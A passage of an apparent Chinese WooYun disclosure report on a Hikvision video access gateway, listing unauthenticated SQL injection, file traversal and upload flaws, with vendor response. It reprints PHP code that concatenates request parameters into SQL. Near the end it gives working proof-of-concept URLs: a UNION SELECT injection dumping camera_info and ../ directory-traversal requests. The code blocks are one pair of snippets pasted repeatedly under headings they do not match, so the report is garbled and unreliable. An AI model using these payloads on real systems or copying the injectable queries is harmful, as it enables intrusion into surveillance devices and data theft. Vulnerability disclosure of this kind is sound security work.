   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

5

第二十七处:/data/saveGroup.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

6

第二十八处:/data/saveRoleInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

7

第二十九处:/data/roleInfoData.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

8

第三十处:/data/shareDeviceInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  $type = $_GET['type'];
  $pNodeId = @$_GET['pNodeId'];
  $dbQuery = new DataBaseQuery();
  if($type=="main"){//取主菜单的树
   findAllMainMenuNode($dbQuery);
  }else{//取子菜单的树
   findAllSubMenuNode($dbQuery,$pNodeId);
  }
 
  class TreeNode{
    var $id;
    var $text;
    var $iconCls;
    var $state;
    var $children=array();
    function __construct(){
   
    }
    public function setId($id)
    {
   $this->id = $id;
    }
    public function setText($text)
    {
   $this->text = $text;
    }
     public function setIconCls($iconCls)
    {
   $this->iconCls = $iconCls;
    }
     public function setState($state)
    {
   $this->state = $state;
    }
     public function setChildren($children)
    {
   $this->children = $children;
    }
     public function getId()
    {
   return $this->id;
    }
    public function getText()
    {
   return $this->text;
    }
     public function getIconCls()
    {
   return $this->iconCls;
    }
     public function getState()
    {
   return $this->state;
    }
     public function getChildren()
    {
   return $this->children;
    }
  
  }
 
  /**
   找出主菜单的树节点
  */
  function findAllMainMenuNode($dbQuery){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('主菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
   while($row = $dbQuery->fetchArray($re)){
    $cNode = new TreeNode();
    $cNode->setId($row['menuId']);
    $cNode->setText($row['name']);
    $cNode->setIconCls('icon-systemMenu');
    if ($pNode->getChildren() != null) {
      $childrenArray = $pNode->getChildren();
      array_push($childrenArray,$cNode);
      $pNode->setChildren($childrenArray);
    }else{
      $childrenNodes = array();
      array_push($childrenNodes,$cNode);
      $pNode->setChildren($childrenNodes);
    }
   }
   print_r(json_encode($jsonArray));
   $dbQuery->closeDb();
  }
 
  /**
   找出子菜单的树节点
  */
  function findAllSubMenuNode($dbQuery,$pNodeId){
   $jsonArray = array();
   $pNode = new TreeNode();
   $pNode->setId('0');
   $pNode->setText('子菜单');
   $pNode->setIconCls('icon-folder');
   array_push($jsonArray,$pNode);
   $re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

9

第三十一处:/data/modifyCameraName.php

code 区域 
<?php
  include('../common/connDb.php');
  include('deviceTypeClass.php');
  $deviceId = $_GET['deviceId'];
  $dbQuery = new DataBaseQuery();
  $re = $dbQuery->query('select type_code,name from device_type_info');
  $deviceTypeArray = array(); //获取所有设备类型
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['type_code'],$row['name']);
   array_push($deviceTypeArray,$deviceType);
  }
 
  $re = $dbQuery->query('select id,name from device_group_info');
  $groupArray = array();
  array_push($groupArray,new DeviceType("0","请选择"));
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['id'],$row['name']);
   array_push($groupArray,$deviceType);
  }
 
  $type_code="";
  $network_addr="";
  $network_port="";
  $username="";
  $password="******";
  $indexcode="";
  $name="";
  $serial_num="";
  $analog_chan_count="";
  $digital_chan_count="";
  $alarm_in_count="";
  $alarm_out_count="";
  $audio_num="";
  $reg_type="";
  $group_id="";
  $allowShare="";
  $ctrl_unit_id ="";
  $re = $dbQuery->query('select * from device_info where id='.$deviceId);

0

第三十二处:/data/saveDeviceInfo.php

code 区域 
<?php
  include('../common/connDb.php');
  include('deviceTypeClass.php');
  $deviceId = $_GET['deviceId'];
  $dbQuery = new DataBaseQuery();
  $re = $dbQuery->query('select type_code,name from device_type_info');
  $deviceTypeArray = array(); //获取所有设备类型
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['type_code'],$row['name']);
   array_push($deviceTypeArray,$deviceType);
  }
 
  $re = $dbQuery->query('select id,name from device_group_info');
  $groupArray = array();
  array_push($groupArray,new DeviceType("0","请选择"));
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['id'],$row['name']);
   array_push($groupArray,$deviceType);
  }
 
  $type_code="";
  $network_addr="";
  $network_port="";
  $username="";
  $password="******";
  $indexcode="";
  $name="";
  $serial_num="";
  $analog_chan_count="";
  $digital_chan_count="";
  $alarm_in_count="";
  $alarm_out_count="";
  $audio_num="";
  $reg_type="";
  $group_id="";
  $allowShare="";
  $ctrl_unit_id ="";
  $re = $dbQuery->query('select * from device_info where id='.$deviceId);

1

漏洞证明:

第三十三处:/data/deviceAndCameraListData.php

code 区域 
<?php
  include('../common/connDb.php');
  include('deviceTypeClass.php');
  $deviceId = $_GET['deviceId'];
  $dbQuery = new DataBaseQuery();
  $re = $dbQuery->query('select type_code,name from device_type_info');
  $deviceTypeArray = array(); //获取所有设备类型
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['type_code'],$row['name']);
   array_push($deviceTypeArray,$deviceType);
  }
 
  $re = $dbQuery->query('select id,name from device_group_info');
  $groupArray = array();
  array_push($groupArray,new DeviceType("0","请选择"));
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['id'],$row['name']);
   array_push($groupArray,$deviceType);
  }
 
  $type_code="";
  $network_addr="";
  $network_port="";
  $username="";
  $password="******";
  $indexcode="";
  $name="";
  $serial_num="";
  $analog_chan_count="";
  $digital_chan_count="";
  $alarm_in_count="";
  $alarm_out_count="";
  $audio_num="";
  $reg_type="";
  $group_id="";
  $allowShare="";
  $ctrl_unit_id ="";
  $re = $dbQuery->query('select * from device_info where id='.$deviceId);

2

第三十四处:/data/groupListData.php

code 区域 
<?php
  include('../common/connDb.php');
  include('deviceTypeClass.php');
  $deviceId = $_GET['deviceId'];
  $dbQuery = new DataBaseQuery();
  $re = $dbQuery->query('select type_code,name from device_type_info');
  $deviceTypeArray = array(); //获取所有设备类型
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['type_code'],$row['name']);
   array_push($deviceTypeArray,$deviceType);
  }
 
  $re = $dbQuery->query('select id,name from device_group_info');
  $groupArray = array();
  array_push($groupArray,new DeviceType("0","请选择"));
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['id'],$row['name']);
   array_push($groupArray,$deviceType);
  }
 
  $type_code="";
  $network_addr="";
  $network_port="";
  $username="";
  $password="******";
  $indexcode="";
  $name="";
  $serial_num="";
  $analog_chan_count="";
  $digital_chan_count="";
  $alarm_in_count="";
  $alarm_out_count="";
  $audio_num="";
  $reg_type="";
  $group_id="";
  $allowShare="";
  $ctrl_unit_id ="";
  $re = $dbQuery->query('select * from device_info where id='.$deviceId);

3

任意文件生成:/data/deletePlugFiles.php

code 区域 
<?php
  include('../common/connDb.php');
  include('deviceTypeClass.php');
  $deviceId = $_GET['deviceId'];
  $dbQuery = new DataBaseQuery();
  $re = $dbQuery->query('select type_code,name from device_type_info');
  $deviceTypeArray = array(); //获取所有设备类型
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['type_code'],$row['name']);
   array_push($deviceTypeArray,$deviceType);
  }
 
  $re = $dbQuery->query('select id,name from device_group_info');
  $groupArray = array();
  array_push($groupArray,new DeviceType("0","请选择"));
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['id'],$row['name']);
   array_push($groupArray,$deviceType);
  }
 
  $type_code="";
  $network_addr="";
  $network_port="";
  $username="";
  $password="******";
  $indexcode="";
  $name="";
  $serial_num="";
  $analog_chan_count="";
  $digital_chan_count="";
  $alarm_in_count="";
  $alarm_out_count="";
  $audio_num="";
  $reg_type="";
  $group_id="";
  $allowShare="";
  $ctrl_unit_id ="";
  $re = $dbQuery->query('select * from device_info where id='.$deviceId);

4

任意文件上传:

code 区域 
<?php
  include('../common/connDb.php');
  include('deviceTypeClass.php');
  $deviceId = $_GET['deviceId'];
  $dbQuery = new DataBaseQuery();
  $re = $dbQuery->query('select type_code,name from device_type_info');
  $deviceTypeArray = array(); //获取所有设备类型
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['type_code'],$row['name']);
   array_push($deviceTypeArray,$deviceType);
  }
 
  $re = $dbQuery->query('select id,name from device_group_info');
  $groupArray = array();
  array_push($groupArray,new DeviceType("0","请选择"));
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['id'],$row['name']);
   array_push($groupArray,$deviceType);
  }
 
  $type_code="";
  $network_addr="";
  $network_port="";
  $username="";
  $password="******";
  $indexcode="";
  $name="";
  $serial_num="";
  $analog_chan_count="";
  $digital_chan_count="";
  $alarm_in_count="";
  $alarm_out_count="";
  $audio_num="";
  $reg_type="";
  $group_id="";
  $allowShare="";
  $ctrl_unit_id ="";
  $re = $dbQuery->query('select * from device_info where id='.$deviceId);

5

任意目录遍历:/remoteUpdate/showFile.php

code 区域 
<?php
  include('../common/connDb.php');
  include('deviceTypeClass.php');
  $deviceId = $_GET['deviceId'];
  $dbQuery = new DataBaseQuery();
  $re = $dbQuery->query('select type_code,name from device_type_info');
  $deviceTypeArray = array(); //获取所有设备类型
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['type_code'],$row['name']);
   array_push($deviceTypeArray,$deviceType);
  }
 
  $re = $dbQuery->query('select id,name from device_group_info');
  $groupArray = array();
  array_push($groupArray,new DeviceType("0","请选择"));
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['id'],$row['name']);
   array_push($groupArray,$deviceType);
  }
 
  $type_code="";
  $network_addr="";
  $network_port="";
  $username="";
  $password="******";
  $indexcode="";
  $name="";
  $serial_num="";
  $analog_chan_count="";
  $digital_chan_count="";
  $alarm_in_count="";
  $alarm_out_count="";
  $audio_num="";
  $reg_type="";
  $group_id="";
  $allowShare="";
  $ctrl_unit_id ="";
  $re = $dbQuery->query('select * from device_info where id='.$deviceId);

6

任意文件遍历:/serverLog/showFile.php

code 区域 
<?php
  include('../common/connDb.php');
  include('deviceTypeClass.php');
  $deviceId = $_GET['deviceId'];
  $dbQuery = new DataBaseQuery();
  $re = $dbQuery->query('select type_code,name from device_type_info');
  $deviceTypeArray = array(); //获取所有设备类型
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['type_code'],$row['name']);
   array_push($deviceTypeArray,$deviceType);
  }
 
  $re = $dbQuery->query('select id,name from device_group_info');
  $groupArray = array();
  array_push($groupArray,new DeviceType("0","请选择"));
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['id'],$row['name']);
   array_push($groupArray,$deviceType);
  }
 
  $type_code="";
  $network_addr="";
  $network_port="";
  $username="";
  $password="******";
  $indexcode="";
  $name="";
  $serial_num="";
  $analog_chan_count="";
  $digital_chan_count="";
  $alarm_in_count="";
  $alarm_out_count="";
  $audio_num="";
  $reg_type="";
  $group_id="";
  $allowShare="";
  $ctrl_unit_id ="";
  $re = $dbQuery->query('select * from device_info where id='.$deviceId);

7

任意文件遍历:

**.**.**.**:7288/serverLog/showFile.php?fileName=../web/html/serverLog/showFile.php

海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&文件遍历&上传等)

随便手工验证一处注入:

**.**.**.**:7288/transformServer/serverConfigInfo.php?transId=1 union select 1,2,3,(select GROUP_CONCAT(1,2) from camera_info),5,6,7,8,9,10,11,12,13,14--

海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&文件遍历&上传等)

目录遍历:

**.**.**.**:7288/remoteUpdate/showFile.php?fileName=../../../

海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&文件遍历&上传等)

案例:

code 区域 
<?php
  include('../common/connDb.php');
  include('deviceTypeClass.php');
  $deviceId = $_GET['deviceId'];
  $dbQuery = new DataBaseQuery();
  $re = $dbQuery->query('select type_code,name from device_type_info');
  $deviceTypeArray = array(); //获取所有设备类型
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['type_code'],$row['name']);
   array_push($deviceTypeArray,$deviceType);
  }
 
  $re = $dbQuery->query('select id,name from device_group_info');
  $groupArray = array();
  array_push($groupArray,new DeviceType("0","请选择"));
  while ($row = $dbQuery->fetchArray($re)){
   $deviceType = new DeviceType($row['id'],$row['name']);
   array_push($groupArray,$deviceType);
  }
 
  $type_code="";
  $network_addr="";
  $network_port="";
  $username="";
  $password="******";
  $indexcode="";
  $name="";
  $serial_num="";
  $analog_chan_count="";
  $digital_chan_count="";
  $alarm_in_count="";
  $alarm_out_count="";
  $audio_num="";
  $reg_type="";
  $group_id="";
  $allowShare="";
  $ctrl_unit_id ="";
  $re = $dbQuery->query('select * from device_info where id='.$deviceId);

8

修复方案:

你们懂的。

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2016-03-06 09:58

厂商回复:

您好,该问题属于与WooYun-2016- 重复问题,该产品线目前已停产。我们会通过各种渠道对使用旧版本的客户平台进行加固升级。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin